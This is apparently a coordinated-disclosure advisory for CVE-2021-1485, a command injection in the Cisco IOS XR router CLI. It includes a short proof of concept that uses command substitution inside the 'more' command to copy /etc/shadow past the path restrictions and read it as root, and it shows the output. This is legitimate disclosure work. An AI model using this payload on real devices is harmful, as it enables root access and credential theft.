CVE: CVE-2021-1485

Tested Versions:

  • Cisco IOS XRv 64 bit 7.0.2

Product URL(s): https://cisco.com

Description of the vulnerability

The router CLI implements some commands as passthrough to the underlying Linux shell. From some tests conducted, it is evident that there are some quoting issues when passing arguments to the shell.

RP/0/RSP0/CPU0# dir "'"
sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file
sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file
dir : ' : Path does not exist

This type of issue could lead to arbitrary command injection from the restricted CLI that does not have direct access to the shell.

Technical Details

Despite having checks for paths outside approved locations, an arbitrary command injection is able to bypass these restrictions.

Because the underlying commands are executed as root, having access to the CLI can compromise the underlying OS.

Here’s a PoC illustrating this issue:

RP/0/RSP0/CPU0# more /etc/shadow
more : /etc/shadow : Path outside filesystem disallowing access

RP/0/RSP0/CPU0# more "$(cp /etc/shadow .)"
/misc/scratch/ is a directory

RP/0/RSP0/CPU0# more shadow
root:*:18298:0:99999:7:::
daemon:*:18298:0:99999:7:::
bin:*:18298:0:99999:7:::
sys:*:18298:0:99999:7:::
sync:*:18298:0:99999:7:::
games:*:18298:0:99999:7:::
man:*:18298:0:99999:7:::
lp:*:18298:0:99999:7:::
mail:*:18298:0:99999:7:::
news:*:18298:0:99999:7:::
uucp:*:18298:0:99999:7:::
proxy:*:18298:0:99999:7:::
www-data:*:18298:0:99999:7:::
backup:*:18298:0:99999:7:::
list:*:18298:0:99999:7:::
irc:*:18298:0:99999:7:::
gnats:*:18298:0:99999:7:::
nobody:*:18298:0:99999:7:::
sshd:!:18298::::::
messagebus:!:18298::::::
rpc:!:18298::::::

This issue also affects mkdir, more, delete, dir because these commands are handled in the same way.

References:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xr-cmdinj-vsKGherc

Timeline:

  • 2020-06-12 Vendor disclosure
  • 2021-04-15 Vendor patched